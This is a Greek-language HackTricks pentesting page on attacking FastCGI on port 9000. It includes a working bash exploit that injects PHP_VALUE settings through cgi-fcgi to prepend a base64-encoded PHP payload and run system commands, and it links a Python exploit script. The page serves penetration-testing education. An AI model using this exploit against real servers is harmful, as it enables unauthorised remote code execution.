hacktricks/network-services-pentesting/9000-pentesting-fastcgi.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

4.6 KiB
Raw Blame History

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Βασικές Πληροφορίες

Εάν θέλετε να μάθετε τι είναι το FastCGI ελέγξτε την παρακάτω σελίδα:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} disable_functions-bypass-php-fpm-fastcgi.md {% endcontent-ref %}

Από προεπιλογή το FastCGI τρέχει στη θύρα 9000 και δεν αναγνωρίζεται από το nmap. Συνήθως το FastCGI ακούει μόνο στο localhost.

RCE

Είναι αρκετά εύκολο να κάνετε το FastCGI να εκτελέσει αυθαίρετο κώδικα:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

Ή μπορείτε επίσης να χρησιμοποιήσετε το παρακάτω σενάριο Python: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: